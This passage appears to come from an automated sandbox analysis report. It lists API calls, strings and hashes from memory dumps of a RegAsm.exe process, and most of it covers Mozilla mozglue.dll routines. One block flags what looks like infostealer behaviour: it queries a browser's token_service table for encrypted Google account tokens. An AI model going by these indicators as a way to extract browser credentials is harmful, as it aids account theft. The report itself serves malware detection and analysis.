                                                                                                                                                                                                                                                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C84DDCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C82FA4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C8490FF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8490E0: free.MOZGLUE(?,00000000,?,?,6C84DEDB), ref: 6C849108
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DE0D
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C84DE41
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DE5F
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DEA3
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C84DEE9
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C83DEFD,?,6C804A68), ref: 6C84DF32
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C84DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C84DB86
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C84DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C84DC0E
                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C83DEFD,?,6C804A68), ref: 6C84DF65
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C84DF80
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 112305417-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1789f98afba99b9dbb6a79318dea9c97cb891e5f8b195ddf0cad116e95aad6a6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 65c5d158e8a329585fe3c6985b64cf423522e8eb08aaf3224941f696d5739ea3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1789f98afba99b9dbb6a79318dea9c97cb891e5f8b195ddf0cad116e95aad6a6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB51D9726017199BD7318B18CA846AEB3B2BF91308F958D2ED41A53F01D731F859CBD2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855D32
                                                                                                                                                                                                                                                                                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855D62
                                                                                                                                                                                                                                                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855D6D
                                                                                                                                                                                                                                                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855D84
                                                                                                                                                                                                                                                                                                  • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855DA4
                                                                                                                                                                                                                                                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855DC9
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6C855DDB
                                                                                                                                                                                                                                                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855E00
                                                                                                                                                                                                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C855C8C,?,6C82E829), ref: 6C855E45
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2325513730-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f65dcf664c688a7a1777e43fd3048c4b366a97dba95860472940bc01b6c4288c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7cf968396c557355b88fcf2b6aa221f1826dd87db8ca87c5f0fee940fa24735e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f65dcf664c688a7a1777e43fd3048c4b366a97dba95860472940bc01b6c4288c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40418F317003148FCB20DF69CA9CAAE7BB6EF89319F544479E50697781EB74E805CBA1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7F31A7), ref: 6C82CDDD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-2186867486
                                                                                                                                                                                                                                                                                                  • Opcode ID: 46f157891ab0e1ce19ac086bf8f40401516e40b046e92fcc04c97f09d2d60350
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8c31b2e199f2514a380b30eb06fd54b1a8761329cc082a4e8c3145be9c9b6a03
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46f157891ab0e1ce19ac086bf8f40401516e40b046e92fcc04c97f09d2d60350
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0131E8317402155BFB30AEA5CE4DBBE7776AB41758F204825F514AB781E7B4D440C7E1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FF100: LoadLibraryW.KERNEL32(shell32,?,6C86D020), ref: 6C7FF122
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7FF132
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000012), ref: 6C7FED50
                                                                                                                                                                                                                                                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7FEDAC
                                                                                                                                                                                                                                                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C7FEDCC
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32 ref: 6C7FEE08
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7FEE27
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C7FEE32
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C7FEBB5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C82D7F3), ref: 6C7FEBC3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7FEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C82D7F3), ref: 6C7FEBD6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C7FEDC1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                                                                                                                                                                                                                                  • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                                                                                                                                                                                                                                  • API String ID: 1980384892-344433685
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1bda5ead5e3546e47a3211d511f4cae4c7c103064c1e86e50c99d1680adae32a
                                                                                                                                                                                                                                                                                                  • Instruction ID: c0c9fd5bce23105c16e954ae967b9da540c35ebcf17d9a01a590f1f0a98e862b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bda5ead5e3546e47a3211d511f4cae4c7c103064c1e86e50c99d1680adae32a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6051F471D053088FEB10DF68DA896EEB7B5AF49318F04883DE86167B40E7306949C7E2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C86A565
  • Part of subcall function 6C86A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C86A4BE
  • Part of subcall function 6C86A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C86A4D6
• ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C86A65B
• ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C86A6B6
Strings
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
Similarity
• API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
• String ID: 0$z
• API String ID: 310210123-2584888582
• Opcode ID: aa37bc8b255caab48e78f9ef7f31c3e32f125b3b994d50aba7a6a47bbfddb0a7
• Instruction ID: e8ea6c8ea1907018d1bc7febe2e05272be7de6dc5ffad61b8ecd978f57b15f33
• Opcode Fuzzy Hash: aa37bc8b255caab48e78f9ef7f31c3e32f125b3b994d50aba7a6a47bbfddb0a7
• Instruction Fuzzy Hash: 3A4158719087499FC351CF29C580A8FBBE4BF89344F408A2EF49987750EB30D949CB82
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
  • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
  • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
  • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
  • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
  • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
  • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
  • Part of subcall function 00407110: memcmp.MSVCRT ref: 0040714B
  • Part of subcall function 00407110: memset.MSVCRT ref: 00407179
  • Part of subcall function 00407110: LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
• lstrlen.KERNEL32(00000000), ref: 00409015
  • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
• StrStrA.SHLWAPI(00000000,AccountId), ref: 0040903B
• lstrlen.KERNEL32(00000000), ref: 00409124
• lstrlen.KERNEL32(00000000), ref: 00409138
Strings
Memory Dump Source
• Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
• String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
• API String ID: 2910778473-1713091031
• Opcode ID: 500e07bd11b97dcf6f28d48f575acb2971e5d5bcd12fae14b5701074da479ef7
• Instruction ID: 94835c60b8661c71cc78b5a216063b7e60eb4f21c63f22e0e3312ed9cf878cdd
• Opcode Fuzzy Hash: 500e07bd11b97dcf6f28d48f575acb2971e5d5bcd12fae14b5701074da479ef7
• Instruction Fuzzy Hash: 55D19E30801248EACB14EBA4D955BEEBBB9AF19304F5441BEF506732D2DB786B0CC765
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C83947D
                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C839459
                                                                                                                                                                                                                                                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C83946B
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                                                                  • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                                                                  • Opcode ID: 98a78bd905fd798e0151342bc583586cced74e7e9dff3cd46fca7a08010ffbd8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1a2b98cb1328874e2cf5112d36d6c87a57bdf5c01f478ad6c625bfc2d2d37d48
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98a78bd905fd798e0151342bc583586cced74e7e9dff3cd46fca7a08010ffbd8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D601B570A001218BD7309B9DDB1DA8F32B5AB0636CF041D36D90EC7B51FA25D4A4CAFA
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB6AC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB6D1
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB6E3
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB70B
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB71D
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C7FB61E), ref: 6C7FB73F
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB760
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C7FB61E,?,?,?,?,?,00000000), ref: 6C7FB79A
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1394714614-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: aa8430161d562eb432bed975f78f03465110d61cba52a6873ef8c9fdf016a26e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2a19d410cf91e6236015f928aff0fdf3f9e1dc669dc0cb44c672e4dcdee9e1ab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa8430161d562eb432bed975f78f03465110d61cba52a6873ef8c9fdf016a26e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5241A1B2D001159FCB14DE7CDE806AEB7B5BB94324F250A3AE825E7781E731A90587E1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C86B5B9
                                                                                                                                                                                                                                                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C86B5C5
                                                                                                                                                                                                                                                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C86B5DA
                                                                                                                                                                                                                                                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C86B5F4
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C86B605
                                                                                                                                                                                                                                                                                                  • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C86B61F
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6C86B631
                                                                                                                                                                                                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C86B655
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
• Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1276798925-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 946488dee3ef46443eaa8538e69c0e5b4a22fc16acbaf56160339ba8bff4941e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9479c402246228f3e8938a1585a868ad910c2b565304babb19452fd65cc7f545
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 946488dee3ef46443eaa8538e69c0e5b4a22fc16acbaf56160339ba8bff4941e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C317471B00114CBCB31DB6ACA5C5BE7BB5FF86329B140935E91697740EB34A806CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C84CC83,?,?,?,?,?,?,?,?,?,6C84BCAE,?,?,6C83DC2C), ref: 6C80B7E6
                                                                                                                                                                                                                                                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C84CC83,?,?,?,?,?,?,?,?,?,6C84BCAE,?,?,6C83DC2C), ref: 6C80B80C
                                                                                                                                                                                                                                                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C84CC83,?,?,?,?,?,?,?,?,?,6C84BCAE), ref: 6C80B88E
                                                                                                                                                                                                                                                                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C84CC83,?,?,?,?,?,?,?,?,?,6C84BCAE,?,?,6C83DC2C), ref: 6C80B896
Memory Dump Source
• Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
